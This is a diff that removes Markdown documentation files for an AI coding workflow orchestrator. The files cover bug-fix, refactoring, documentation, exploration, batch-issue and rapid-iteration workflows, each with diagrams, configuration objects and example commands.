Bug-fix workflow: intelligent diagnosis + impact assessment + fix
|
||||
|
||||
## Pattern
|
||||
|
||||
```
|
||||
lite-fix [--hotfix]
|
||||
```
|
||||
|
||||
## Trigger Conditions

- Keywords: "fix", "bug", "error", "crash", "broken", "fail", "修复", "报错"
- Problem symptoms described
- Error messages present
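As a rough illustration of how these trigger keywords might drive routing between the two modes, here is a minimal keyword-matching sketch. The pattern lists mirror the intent rules earlier in this repo; the function name and return shape are hypothetical, not part of the CCW codebase.

```javascript
// Minimal sketch of keyword-based bugfix classification (illustrative only).
const HOTFIX_PATTERNS = ['hotfix', 'urgent', 'production', 'critical', 'emergency', '紧急', '生产环境', '线上'];
const STANDARD_PATTERNS = ['fix', 'bug', 'error', 'crash', 'broken', 'fail', 'wrong', '修复', '错误', '崩溃'];

function classifyBugfix(prompt) {
  const text = prompt.toLowerCase();
  if (HOTFIX_PATTERNS.some(p => text.includes(p))) {
    return { flow: 'bugfix.hotfix', command: '/workflow:lite-fix --hotfix' };
  }
  if (STANDARD_PATTERNS.some(p => text.includes(p))) {
    return { flow: 'bugfix.standard', command: '/workflow:lite-fix' };
  }
  return null; // not a bugfix intent; fall through to the other intent rules
}

// Example: classifyBugfix('紧急:支付网关 5xx') → { flow: 'bugfix.hotfix', ... }
```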
|
||||
|
||||
## Execution Flow
|
||||
|
||||
### Standard Mode
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant U as User
|
||||
participant O as CCW Orchestrator
|
||||
participant LF as lite-fix
|
||||
participant CLI as CLI Tools
|
||||
|
||||
U->>O: Bug description
|
||||
O->>O: Classify: bugfix (standard)
|
||||
O->>LF: /workflow:lite-fix "bug"
|
||||
|
||||
Note over LF: Phase 1: Diagnosis
|
||||
LF->>CLI: Root cause analysis (Gemini)
|
||||
CLI-->>LF: diagnosis.json
|
||||
|
||||
Note over LF: Phase 2: Impact Assessment
|
||||
LF->>LF: Risk scoring (0-10)
|
||||
LF->>LF: Severity classification
|
||||
LF-->>U: Impact report
|
||||
|
||||
Note over LF: Phase 3: Fix Strategy
|
||||
LF->>LF: Generate fix options
|
||||
LF-->>U: Present strategies
|
||||
U->>LF: Select strategy
|
||||
|
||||
Note over LF: Phase 4: Verification Plan
|
||||
LF->>LF: Generate test plan
|
||||
LF-->>U: Verification approach
|
||||
|
||||
Note over LF: Phase 5: Confirmation
|
||||
LF->>U: Execution method?
|
||||
U->>LF: Confirm
|
||||
|
||||
Note over LF: Phase 6: Execute
|
||||
LF->>CLI: Execute fix (Agent/Codex)
|
||||
CLI-->>LF: Results
|
||||
LF-->>U: Fix complete
|
||||
```
|
||||
|
||||
### Hotfix Mode
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant U as User
|
||||
participant O as CCW Orchestrator
|
||||
participant LF as lite-fix
|
||||
participant CLI as CLI Tools
|
||||
|
||||
U->>O: Urgent bug + "hotfix"
|
||||
O->>O: Classify: bugfix (hotfix)
|
||||
O->>LF: /workflow:lite-fix --hotfix "bug"
|
||||
|
||||
Note over LF: Minimal Diagnosis
|
||||
LF->>CLI: Quick root cause
|
||||
CLI-->>LF: Known issue?
|
||||
|
||||
Note over LF: Surgical Fix
|
||||
LF->>LF: Single optimal fix
|
||||
LF-->>U: Quick confirmation
|
||||
U->>LF: Proceed
|
||||
|
||||
Note over LF: Smoke Test
|
||||
LF->>CLI: Minimal verification
|
||||
CLI-->>LF: Pass/Fail
|
||||
|
||||
Note over LF: Follow-up Generation
|
||||
LF->>LF: Generate follow-up tasks
|
||||
LF-->>U: Fix deployed + follow-ups created
|
||||
```
|
||||
|
||||
## When to Use

### Standard Mode (/workflow:lite-fix)
✅ **Use for**:
- Bugs with known symptoms
- Localized fixes (1-5 files)
- Non-urgent problems
- Cases that need full diagnosis

### Hotfix Mode (/workflow:lite-fix --hotfix)
✅ **Use for**:
- Production incidents
- Urgent fixes
- Clear single points of failure
- Time-sensitive situations

❌ **Don't use** (for either mode):
- Architecture changes needed → `/workflow:plan --mode bugfix`
- Multiple related problems → `/issue:plan`
|
||||
|
||||
## Severity Classification

| Score | Severity | Response | Verification |
|-------|----------|----------|--------------|
| 8-10 | Critical | Immediate | Smoke test only |
| 6-7.9 | High | Fast track | Integration tests |
| 4-5.9 | Medium | Normal | Full test suite |
| 0-3.9 | Low | Scheduled | Comprehensive |
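A minimal sketch of how a 0-10 risk score could be mapped onto these tiers (illustrative only; the function and field names are assumptions, not CCW APIs):

```javascript
// Maps a 0-10 risk score to the severity tiers in the table above.
function classifySeverity(score) {
  if (score >= 8) return { severity: 'critical', response: 'immediate', verification: 'smoke' };
  if (score >= 6) return { severity: 'high', response: 'fast-track', verification: 'integration' };
  if (score >= 4) return { severity: 'medium', response: 'normal', verification: 'full-suite' };
  return { severity: 'low', response: 'scheduled', verification: 'comprehensive' };
}

// Example: classifySeverity(6.5) → { severity: 'high', verification: 'integration', ... }
```

This is the kind of mapping that `verification.autoSelect` in the configuration below is meant to capture: higher severity trades test depth for response time.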
|
||||
|
||||
## Configuration
|
||||
|
||||
```javascript
|
||||
const bugfixConfig = {
|
||||
standard: {
|
||||
diagnosis: {
|
||||
tool: 'gemini',
|
||||
depth: 'comprehensive',
|
||||
timeout: 300000 // 5 min
|
||||
},
|
||||
impact: {
|
||||
riskThreshold: 6.0, // High risk threshold
|
||||
autoEscalate: true
|
||||
},
|
||||
verification: {
|
||||
levels: ['smoke', 'integration', 'full'],
|
||||
autoSelect: true // Based on severity
|
||||
}
|
||||
},
|
||||
|
||||
hotfix: {
|
||||
diagnosis: {
|
||||
tool: 'gemini',
|
||||
depth: 'minimal',
|
||||
timeout: 60000 // 1 min
|
||||
},
|
||||
fix: {
|
||||
strategy: 'single', // Single optimal fix
|
||||
surgical: true
|
||||
},
|
||||
followup: {
|
||||
generate: true,
|
||||
types: ['comprehensive-fix', 'post-mortem']
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Example Invocations
|
||||
|
||||
```bash
|
||||
# Standard bug fix
|
||||
ccw "用户头像上传失败,返回 413 错误"
|
||||
→ lite-fix
|
||||
→ Diagnosis: File size limit in nginx
|
||||
→ Impact: 6.5 (High)
|
||||
→ Fix: Update nginx config + add client validation
|
||||
→ Verify: Integration test
|
||||
|
||||
# Production hotfix
|
||||
ccw "紧急:支付网关返回 5xx 错误,影响所有用户"
|
||||
→ lite-fix --hotfix
|
||||
→ Quick diagnosis: API key expired
|
||||
→ Surgical fix: Rotate key
|
||||
→ Smoke test: Payment flow
|
||||
→ Follow-ups: Key rotation automation, monitoring alert
|
||||
|
||||
# Unknown root cause
|
||||
ccw "购物车随机丢失商品,原因不明"
|
||||
→ lite-fix
|
||||
→ Deep diagnosis (auto)
|
||||
→ Root cause: Race condition in concurrent updates
|
||||
→ Fix: Add optimistic locking
|
||||
→ Verify: Concurrent test suite
|
||||
```
|
||||
|
||||
## Output Artifacts
|
||||
|
||||
```
|
||||
.workflow/.lite-fix/{bug-slug}-{timestamp}/
|
||||
├── diagnosis.json # Root cause analysis
|
||||
├── impact.json # Risk assessment
|
||||
├── fix-plan.json # Fix strategy
|
||||
├── task.json # Enhanced task for execution
|
||||
└── followup.json # Follow-up tasks (hotfix only)
|
||||
```
|
||||
|
||||
## Follow-up Tasks (Hotfix Mode)
|
||||
|
||||
```json
|
||||
{
|
||||
"followups": [
|
||||
{
|
||||
"id": "FOLLOWUP-001",
|
||||
"type": "comprehensive-fix",
|
||||
"title": "Complete fix for payment gateway issue",
|
||||
"due": "3 days",
|
||||
"description": "Implement full solution with proper error handling"
|
||||
},
|
||||
{
|
||||
"id": "FOLLOWUP-002",
|
||||
"type": "post-mortem",
|
||||
"title": "Post-mortem analysis",
|
||||
"due": "1 week",
|
||||
"description": "Document incident and prevention measures"
|
||||
}
|
||||
]
|
||||
}
|
||||
```
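To make the follow-up structure concrete, here is a small sketch that builds these two records after a hotfix. Everything is illustrative; only the shape and due dates mirror the example above.

```javascript
// Rough sketch of follow-up generation after a hotfix (hypothetical helper).
function generateFollowups(incident) {
  return [
    {
      id: 'FOLLOWUP-001',
      type: 'comprehensive-fix',
      title: `Complete fix for ${incident.title}`,
      due: '3 days',
      description: 'Implement the full solution with proper error handling',
    },
    {
      id: 'FOLLOWUP-002',
      type: 'post-mortem',
      title: 'Post-mortem analysis',
      due: '1 week',
      description: 'Document the incident and prevention measures',
    },
  ];
}
```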
|
||||
@@ -1,194 +0,0 @@
|
||||
# Action: Coupled Workflow
|
||||
|
||||
Complex coupled workflow: comprehensive planning + verification + execution
|
||||
|
||||
## Pattern
|
||||
|
||||
```
|
||||
plan → action-plan-verify → execute
|
||||
```
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- Complexity: High
|
||||
- Keywords: "refactor", "重构", "migrate", "迁移", "architect", "架构"
|
||||
- Cross-module changes
|
||||
- System-level modifications
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant U as User
|
||||
participant O as CCW Orchestrator
|
||||
participant PL as plan
|
||||
participant VF as verify
|
||||
participant EX as execute
|
||||
participant RV as review
|
||||
|
||||
U->>O: Complex task
|
||||
O->>O: Classify: coupled (high complexity)
|
||||
|
||||
Note over PL: Phase 1: Comprehensive Planning
|
||||
O->>PL: /workflow:plan
|
||||
PL->>PL: Multi-phase planning
|
||||
PL->>PL: Generate IMPL_PLAN.md
|
||||
PL->>PL: Generate task JSONs
|
||||
PL-->>U: Present plan
|
||||
|
||||
Note over VF: Phase 2: Verification
|
||||
U->>VF: /workflow:action-plan-verify
|
||||
VF->>VF: Cross-artifact consistency
|
||||
VF->>VF: Dependency validation
|
||||
VF->>VF: Quality gate checks
|
||||
VF-->>U: Verification report
|
||||
|
||||
alt Verification failed
|
||||
U->>PL: Replan with issues
|
||||
else Verification passed
|
||||
Note over EX: Phase 3: Execution
|
||||
U->>EX: /workflow:execute
|
||||
EX->>EX: DAG-based parallel execution
|
||||
EX-->>U: Execution complete
|
||||
end
|
||||
|
||||
Note over RV: Phase 4: Review
|
||||
U->>RV: /workflow:review
|
||||
RV-->>U: Review findings
|
||||
```
|
||||
|
||||
## When to Use

✅ **Ideal scenarios**:
- Large-scale refactoring
- Architecture migrations
- Cross-module feature development
- Tech-stack upgrades
- Team collaboration projects

❌ **Avoid when**:
- Simple, localized changes
- Time is tight
- Small, independent features
|
||||
|
||||
## Verification Checks

| Check | Description | Severity |
|-------|-------------|----------|
| Dependency Cycles | Detect circular dependencies | Critical |
| Missing Tasks | Plan diverges from actual tasks | High |
| File Conflicts | Multiple tasks modify the same file | Medium |
| Coverage Gaps | Requirements not covered by any task | Medium |
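A minimal sketch of the Dependency Cycles check, assuming the tasks are the IMPL-*.json objects with `id` and `depends_on` fields (the function itself is hypothetical, not the actual verifier):

```javascript
// Depth-first search over depends_on edges; returns the first cycle found, or null.
function findDependencyCycle(tasks) {
  const deps = new Map(tasks.map(t => [t.id, t.depends_on || []]));
  const state = new Map(); // 'visiting' | 'done'

  function visit(id, path) {
    if (state.get(id) === 'done') return null;
    if (state.get(id) === 'visiting') return [...path, id]; // cycle closed here
    state.set(id, 'visiting');
    for (const dep of deps.get(id) || []) {
      const cycle = visit(dep, [...path, id]);
      if (cycle) return cycle;
    }
    state.set(id, 'done');
    return null;
  }

  for (const t of tasks) {
    const cycle = visit(t.id, []);
    if (cycle) return cycle; // e.g. ['IMPL-001', 'IMPL-002', 'IMPL-001']
  }
  return null;
}
```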
|
||||
|
||||
## Configuration
|
||||
|
||||
```javascript
|
||||
const coupledConfig = {
|
||||
plan: {
|
||||
phases: 5, // Full 5-phase planning
|
||||
taskGeneration: 'action-planning-agent',
|
||||
outputFormat: {
|
||||
implPlan: '.workflow/plans/IMPL_PLAN.md',
|
||||
taskJsons: '.workflow/tasks/IMPL-*.json'
|
||||
}
|
||||
},
|
||||
|
||||
verify: {
|
||||
required: true, // Always verify before execute
|
||||
autoReplan: false, // Manual replan on failure
|
||||
qualityGates: ['no-cycles', 'no-conflicts', 'complete-coverage']
|
||||
},
|
||||
|
||||
execute: {
|
||||
dagParallel: true,
|
||||
checkpointInterval: 3, // Checkpoint every 3 tasks
|
||||
rollbackOnFailure: true
|
||||
},
|
||||
|
||||
review: {
|
||||
types: ['architecture', 'security'],
|
||||
required: true
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Task JSON Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "IMPL-001",
|
||||
"title": "重构认证模块核心逻辑",
|
||||
"scope": "src/auth/**",
|
||||
"action": "refactor",
|
||||
"depends_on": [],
|
||||
"modification_points": [
|
||||
{
|
||||
"file": "src/auth/service.ts",
|
||||
"target": "AuthService",
|
||||
"change": "Extract OAuth2 logic"
|
||||
}
|
||||
],
|
||||
"acceptance": [
|
||||
"所有现有测试通过",
|
||||
"OAuth2 流程可用"
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Example Invocations
|
||||
|
||||
```bash
|
||||
# Architecture refactoring
|
||||
ccw "重构整个认证模块,从 session 迁移到 JWT"
|
||||
→ plan (5 phases)
|
||||
→ verify
|
||||
→ execute
|
||||
|
||||
# System migration
|
||||
ccw "将数据库从 MySQL 迁移到 PostgreSQL"
|
||||
→ plan (migration strategy)
|
||||
→ verify (data integrity checks)
|
||||
→ execute (staged migration)
|
||||
|
||||
# Cross-module feature
|
||||
ccw "实现跨服务的分布式事务支持"
|
||||
→ plan (architectural design)
|
||||
→ verify (consistency checks)
|
||||
→ execute (incremental rollout)
|
||||
```
|
||||
|
||||
## Output Artifacts
|
||||
|
||||
```
|
||||
.workflow/
|
||||
├── plans/
|
||||
│ └── IMPL_PLAN.md # Comprehensive plan
|
||||
├── tasks/
|
||||
│ ├── IMPL-001.json
|
||||
│ ├── IMPL-002.json
|
||||
│ └── ...
|
||||
├── verify/
|
||||
│ └── verification-report.md # Verification results
|
||||
└── reviews/
|
||||
└── {review-type}.md # Review findings
|
||||
```
|
||||
|
||||
## Replan Flow
|
||||
|
||||
When verification fails:
|
||||
|
||||
```javascript
|
||||
if (verificationResult.status === 'failed') {
|
||||
console.log(`
|
||||
## Verification Failed
|
||||
|
||||
**Issues found**:
|
||||
${verificationResult.issues.map(i => `- ${i.severity}: ${i.message}`).join('\n')}
|
||||
|
||||
**Options**:
|
||||
1. /workflow:replan - Address issues and regenerate plan
|
||||
2. /workflow:plan --force - Proceed despite issues (not recommended)
|
||||
3. Review issues manually and fix plan files
|
||||
`)
|
||||
}
|
||||
```
|
||||
@@ -1,93 +0,0 @@
|
||||
# Documentation Workflow Action
|
||||
|
||||
## Pattern
|
||||
```
|
||||
memory:docs → execute (full)
|
||||
memory:update-related (incremental)
|
||||
```
|
||||
|
||||
## Trigger Conditions

- Keywords: "文档", "documentation", "docs", "readme", "注释"
- Variant triggers:
  - `incremental`: "更新", "增量", "相关"
  - `full`: "全部", "完整", "所有"
|
||||
|
||||
## Variants
|
||||
|
||||
### Full Documentation
|
||||
```mermaid
|
||||
graph TD
|
||||
A[User Input] --> B[memory:docs]
|
||||
B --> C[项目结构分析]
|
||||
C --> D[模块分组 ≤10/task]
|
||||
D --> E[execute: 并行生成]
|
||||
E --> F[README.md]
|
||||
E --> G[ARCHITECTURE.md]
|
||||
E --> H[API Docs]
|
||||
E --> I[Module CLAUDE.md]
|
||||
```
|
||||
|
||||
### Incremental Update
|
||||
```mermaid
|
||||
graph TD
|
||||
A[Git Changes] --> B[memory:update-related]
|
||||
B --> C[变更模块检测]
|
||||
C --> D[相关文档定位]
|
||||
D --> E[增量更新]
|
||||
```
|
||||
|
||||
## Configuration

| Parameter | Default | Description |
|------|--------|------|
| batch_size | 4 | Modules processed per agent |
| format | markdown | Output format |
| include_api | true | Generate API documentation |
| include_diagrams | true | Generate Mermaid diagrams |
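A minimal sketch of how modules might be grouped for parallel documentation tasks using the `batch_size` default above; the helper is illustrative, not the actual implementation:

```javascript
// Split the module list into batches; each batch becomes one doc-generation task.
function groupModules(modules, batchSize = 4) {
  const batches = [];
  for (let i = 0; i < modules.length; i += batchSize) {
    batches.push(modules.slice(i, i + batchSize));
  }
  return batches;
}

// Example: groupModules(['auth', 'billing', 'search', 'ui', 'api']) →
//   [['auth', 'billing', 'search', 'ui'], ['api']]
```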
|
||||
|
||||
## CLI Integration

| Phase | CLI Hint | Purpose |
|------|----------|------|
| memory:docs | `gemini --mode analysis` | Project structure analysis |
| execute | `gemini --mode write` | Documentation generation |
| update-related | `gemini --mode write` | Incremental updates |
|
||||
|
||||
## Slash Commands
|
||||
|
||||
```bash
/memory:docs              # Plan full documentation generation
/memory:docs-full-cli     # Generate full docs via CLI
/memory:docs-related-cli  # Generate incremental docs via CLI
/memory:update-related    # Update docs related to recent changes
/memory:update-full       # Update all CLAUDE.md files
```
|
||||
|
||||
## Output Structure
|
||||
|
||||
```
project/
├── README.md                # Project overview
├── ARCHITECTURE.md          # Architecture documentation
├── docs/
│   └── api/                 # API documentation
└── src/
    └── module/
        └── CLAUDE.md        # Module documentation
```
|
||||
|
||||
## When to Use

- Initial documentation for a new project
- Documentation refresh before a major release
- Syncing docs after code changes
- API documentation generation
|
||||
|
||||
## Risk Assessment

| Risk | Mitigation |
|------|----------|
| Docs drift out of sync with code | Git hook integration |
| Generated content too verbose | Controlled via batch_size |
| Important modules missed | Full-scan verification |
|
||||
@@ -1,154 +0,0 @@
|
||||
# Action: Full Workflow
|
||||
|
||||
Full exploration workflow: analysis + brainstorming + planning + execution
|
||||
|
||||
## Pattern
|
||||
|
||||
```
|
||||
brainstorm:auto-parallel → plan → [verify] → execute
|
||||
```
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- Intent: Exploration (uncertainty detected)
|
||||
- Keywords: "不确定", "不知道", "explore", "怎么做", "what if"
|
||||
- No clear implementation path
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant U as User
|
||||
participant O as CCW Orchestrator
|
||||
participant BS as brainstorm
|
||||
participant PL as plan
|
||||
participant VF as verify
|
||||
participant EX as execute
|
||||
|
||||
U->>O: Unclear task
|
||||
O->>O: Classify: full
|
||||
|
||||
Note over BS: Phase 1: Brainstorm
|
||||
O->>BS: /workflow:brainstorm:auto-parallel
|
||||
BS->>BS: Multi-role parallel analysis
|
||||
BS->>BS: Synthesis & recommendations
|
||||
BS-->>U: Present options
|
||||
U->>BS: Select direction
|
||||
|
||||
Note over PL: Phase 2: Plan
|
||||
BS->>PL: /workflow:plan
|
||||
PL->>PL: Generate IMPL_PLAN.md
|
||||
PL->>PL: Generate task JSONs
|
||||
PL-->>U: Review plan
|
||||
|
||||
Note over VF: Phase 3: Verify (optional)
|
||||
U->>VF: /workflow:action-plan-verify
|
||||
VF->>VF: Cross-artifact consistency
|
||||
VF-->>U: Verification report
|
||||
|
||||
Note over EX: Phase 4: Execute
|
||||
U->>EX: /workflow:execute
|
||||
EX->>EX: DAG-based parallel execution
|
||||
EX-->>U: Execution complete
|
||||
```
|
||||
|
||||
## When to Use

✅ **Ideal scenarios**:
- Exploring product direction
- Evaluating technology choices
- Architecture design decisions
- Planning complex features
- Multiple role perspectives needed

❌ **Avoid when**:
- The task is clear and simple
- Time is tight
- A mature solution already exists
|
||||
|
||||
## Brainstorm Roles

| Role | Focus | Typical Questions |
|------|-------|-------------------|
| Product Manager | User value, market positioning | "What is the user's pain point?" |
| System Architect | Technical approach, architecture design | "How do we ensure scalability?" |
| UX Expert | User experience, interaction design | "Is the user flow smooth?" |
| Security Expert | Security risks, compliance requirements | "What are the security concerns?" |
| Data Architect | Data model, storage strategy | "How is the data organized?" |
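A minimal sketch of how the per-role analyses could be fanned out in parallel, assuming a `runRoleAnalysis` callback that wraps a CLI call (hypothetical; the role list matches the defaults in the configuration below):

```javascript
// Launch one analysis per role concurrently; results feed the synthesis step.
const roles = ['product-manager', 'system-architect', 'ux-expert'];

async function brainstormParallel(topic, runRoleAnalysis) {
  const results = await Promise.all(
    roles.map(role => runRoleAnalysis({ role, topic, tool: 'gemini', mode: 'analysis' }))
  );
  return Object.fromEntries(roles.map((role, i) => [role, results[i]]));
}
```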
|
||||
|
||||
## Configuration
|
||||
|
||||
```javascript
|
||||
const fullConfig = {
|
||||
brainstorm: {
|
||||
defaultRoles: ['product-manager', 'system-architect', 'ux-expert'],
|
||||
maxRoles: 5,
|
||||
synthesis: true // Always generate synthesis
|
||||
},
|
||||
|
||||
plan: {
|
||||
verifyBeforeExecute: true, // Recommend verification
|
||||
taskFormat: 'json' // Generate task JSONs
|
||||
},
|
||||
|
||||
execute: {
|
||||
dagParallel: true, // DAG-based parallel execution
|
||||
testGeneration: 'optional' // Suggest test-gen after
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Continuation Points
|
||||
|
||||
After each phase, CCW can continue to the next:
|
||||
|
||||
```javascript
|
||||
// After brainstorm completes
|
||||
console.log(`
|
||||
## Brainstorm Complete
|
||||
|
||||
**Next steps**:
|
||||
1. /workflow:plan "基于头脑风暴结果规划实施"
|
||||
2. Or refine: /workflow:brainstorm:synthesis
|
||||
`)
|
||||
|
||||
// After plan completes
|
||||
console.log(`
|
||||
## Plan Complete
|
||||
|
||||
**Next steps**:
|
||||
1. /workflow:action-plan-verify (recommended)
|
||||
2. /workflow:execute (直接执行)
|
||||
`)
|
||||
```
|
||||
|
||||
## Example Invocations
|
||||
|
||||
```bash
|
||||
# Product exploration
|
||||
ccw "我想做一个团队协作工具,但不确定具体方向"
|
||||
→ brainstorm:auto-parallel (5 roles)
|
||||
→ plan
|
||||
→ execute
|
||||
|
||||
# Technical exploration
|
||||
ccw "如何设计一个高可用的消息队列系统?"
|
||||
→ brainstorm:auto-parallel (system-architect, data-architect)
|
||||
→ plan
|
||||
→ verify
|
||||
→ execute
|
||||
```
|
||||
|
||||
## Output Artifacts
|
||||
|
||||
```
|
||||
.workflow/
|
||||
├── brainstorm/
|
||||
│ ├── {session}/
|
||||
│ │ ├── role-{role}.md
|
||||
│ │ └── synthesis.md
|
||||
├── plans/
|
||||
│ └── IMPL_PLAN.md
|
||||
└── tasks/
|
||||
└── IMPL-*.json
|
||||
```
|
||||
@@ -1,201 +0,0 @@
|
||||
# Action: Issue Workflow
|
||||
|
||||
Batch issue-handling workflow: planning + queueing + batch execution
|
||||
|
||||
## Pattern
|
||||
|
||||
```
|
||||
issue:plan → issue:queue → issue:execute
|
||||
```
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- Keywords: "issues", "batch", "queue", "多个", "批量"
|
||||
- Multiple related problems
|
||||
- Long-running fix campaigns
|
||||
- Priority-based processing needed
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant U as User
|
||||
participant O as CCW Orchestrator
|
||||
participant IP as issue:plan
|
||||
participant IQ as issue:queue
|
||||
participant IE as issue:execute
|
||||
|
||||
U->>O: Multiple issues / batch fix
|
||||
O->>O: Classify: issue
|
||||
|
||||
Note over IP: Phase 1: Issue Planning
|
||||
O->>IP: /issue:plan
|
||||
IP->>IP: Load unplanned issues
|
||||
IP->>IP: Generate solutions per issue
|
||||
IP->>U: Review solutions
|
||||
U->>IP: Bind selected solutions
|
||||
|
||||
Note over IQ: Phase 2: Queue Formation
|
||||
IP->>IQ: /issue:queue
|
||||
IQ->>IQ: Conflict analysis
|
||||
IQ->>IQ: Priority calculation
|
||||
IQ->>IQ: DAG construction
|
||||
IQ->>U: High-severity conflicts?
|
||||
U->>IQ: Resolve conflicts
|
||||
IQ->>IQ: Generate execution queue
|
||||
|
||||
Note over IE: Phase 3: Execution
|
||||
IQ->>IE: /issue:execute
|
||||
IE->>IE: DAG-based parallel execution
|
||||
IE->>IE: Per-solution progress tracking
|
||||
IE-->>U: Batch execution complete
|
||||
```
|
||||
|
||||
## When to Use

✅ **Ideal scenarios**:
- Multiple related bugs that need batch fixing
- Batch processing of GitHub Issues
- Tech-debt cleanup
- Batch remediation of security vulnerabilities
- Code-quality improvement campaigns

❌ **Avoid when**:
- A single problem → `/workflow:lite-fix`
- Independent, unrelated tasks → handle them separately
- Urgent production incidents → `/workflow:lite-fix --hotfix`
|
||||
|
||||
## Issue Lifecycle
|
||||
|
||||
```
|
||||
draft → planned → queued → executing → completed
|
||||
↓ ↓
|
||||
skipped on-hold
|
||||
```
|
||||
|
||||
## Conflict Types

| Type | Description | Resolution |
|------|-------------|------------|
| File | Multiple solutions modify the same file | Sequential execution |
| API | Impact of API signature changes | Dependency ordering |
| Data | Conflicting data-structure changes | User decision |
| Dependency | Package dependency conflicts | Version negotiation |
| Architecture | Conflicting architectural direction | User decision (high severity) |
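As an illustration of the File conflict type, a minimal sketch that flags overlapping files between bound solutions (field names are assumptions, not CCW internals):

```javascript
// Pairwise scan of solutions; any shared file forces sequential execution.
function findFileConflicts(solutions) {
  const conflicts = [];
  for (let i = 0; i < solutions.length; i++) {
    for (let j = i + 1; j < solutions.length; j++) {
      const overlap = solutions[i].files.filter(f => solutions[j].files.includes(f));
      if (overlap.length > 0) {
        conflicts.push({
          type: 'file',
          between: [solutions[i].id, solutions[j].id],
          files: overlap,
          resolution: 'sequential', // per the table above
        });
      }
    }
  }
  return conflicts;
}
```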
|
||||
|
||||
## Configuration
|
||||
|
||||
```javascript
|
||||
const issueConfig = {
|
||||
plan: {
|
||||
solutionsPerIssue: 3, // Generate up to 3 solutions
|
||||
autoSelect: false, // User must bind solution
|
||||
planningAgent: 'issue-plan-agent'
|
||||
},
|
||||
|
||||
queue: {
|
||||
conflictAnalysis: true,
|
||||
priorityCalculation: true,
|
||||
clarifyThreshold: 'high', // Ask user for high-severity conflicts
|
||||
queueAgent: 'issue-queue-agent'
|
||||
},
|
||||
|
||||
execute: {
|
||||
dagParallel: true,
|
||||
executionLevel: 'solution', // Execute by solution, not task
|
||||
executor: 'codex',
|
||||
resumable: true
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Example Invocations
|
||||
|
||||
```bash
|
||||
# From GitHub Issues
|
||||
ccw "批量处理所有 label:bug 的 GitHub Issues"
|
||||
→ issue:new (import from GitHub)
|
||||
→ issue:plan (generate solutions)
|
||||
→ issue:queue (form execution queue)
|
||||
→ issue:execute (batch execute)
|
||||
|
||||
# Tech debt cleanup
|
||||
ccw "处理所有 TODO 注释和已知技术债务"
|
||||
→ issue:discover (find issues)
|
||||
→ issue:plan (plan solutions)
|
||||
→ issue:queue (prioritize)
|
||||
→ issue:execute (execute)
|
||||
|
||||
# Security vulnerabilities
|
||||
ccw "修复所有 npm audit 报告的安全漏洞"
|
||||
→ issue:new (from audit report)
|
||||
→ issue:plan (upgrade strategies)
|
||||
→ issue:queue (conflict resolution)
|
||||
→ issue:execute (staged upgrades)
|
||||
```
|
||||
|
||||
## Queue Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"queue_id": "QUE-20251227-143000",
|
||||
"status": "active",
|
||||
"execution_groups": [
|
||||
{
|
||||
"id": "P1",
|
||||
"type": "parallel",
|
||||
"solutions": ["SOL-ISS-001-1", "SOL-ISS-002-1"],
|
||||
"description": "Independent fixes, no file overlap"
|
||||
},
|
||||
{
|
||||
"id": "S1",
|
||||
"type": "sequential",
|
||||
"solutions": ["SOL-ISS-003-1"],
|
||||
"depends_on": ["P1"],
|
||||
"description": "Depends on P1 completion"
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
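
The `execution_groups` above drive how `/issue:execute` schedules work. A minimal sketch of that scheduling loop, assuming groups are listed in dependency order and that a hypothetical `runSolution()` helper executes one bound solution:

```javascript
// Sketch only: walk execution_groups in order, running parallel groups concurrently
// and honoring depends_on before sequential groups. runSolution() is a hypothetical helper.
async function runQueue(queue) {
  const done = new Set()
  for (const group of queue.execution_groups) {
    const unmet = (group.depends_on || []).filter(id => !done.has(id))
    if (unmet.length) throw new Error(`Group ${group.id} is waiting on: ${unmet.join(', ')}`)

    if (group.type === 'parallel') {
      await Promise.all(group.solutions.map(runSolution))   // no file overlap, safe to parallelize
    } else {
      for (const sol of group.solutions) await runSolution(sol)
    }
    done.add(group.id)
  }
}
```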

## Output Artifacts

```
.workflow/issues/
├── issues.jsonl              # All issues (one per line)
├── solutions/
│   ├── ISS-001.jsonl         # Solutions for ISS-001
│   └── ISS-002.jsonl
├── queues/
│   ├── index.json            # Queue index
│   └── QUE-xxx.json          # Queue details
└── execution/
    └── {queue-id}/
        ├── progress.json
        └── results/
```

## Progress Tracking

```javascript
// Real-time progress during execution
const progress = {
  queue_id: "QUE-xxx",
  total_solutions: 5,
  completed: 2,
  in_progress: 1,
  pending: 2,
  current_group: "P1",
  eta: "15 minutes"
}
```

## Resume Capability

```bash
# If execution is interrupted
ccw "Resume the issue queue"
→ Detects active queue: QUE-xxx
→ Resumes from last checkpoint
→ /issue:execute --resume
```
@@ -1,104 +0,0 @@
# Action: Rapid Workflow

Rapid-iteration workflow combo: multi-model collaborative analysis + direct execution

## Pattern

```
lite-plan → lite-execute
```

## Trigger Conditions

- Complexity: Low to Medium
- Intent: Feature development
- Context: Clear requirements, known implementation path
- No uncertainty keywords

## Execution Flow

```mermaid
sequenceDiagram
    participant U as User
    participant O as CCW Orchestrator
    participant LP as lite-plan
    participant LE as lite-execute
    participant CLI as CLI Tools

    U->>O: Task description
    O->>O: Classify: rapid
    O->>LP: /workflow:lite-plan "task"

    LP->>LP: Complexity assessment
    LP->>CLI: Parallel explorations (if needed)
    CLI-->>LP: Exploration results
    LP->>LP: Generate plan.json
    LP->>U: Display plan, ask confirmation
    U->>LP: Confirm + select execution method

    LP->>LE: /workflow:lite-execute --in-memory
    LE->>CLI: Execute tasks (Agent/Codex)
    CLI-->>LE: Results
    LE->>LE: Optional code review
    LE-->>U: Execution complete
```

## When to Use

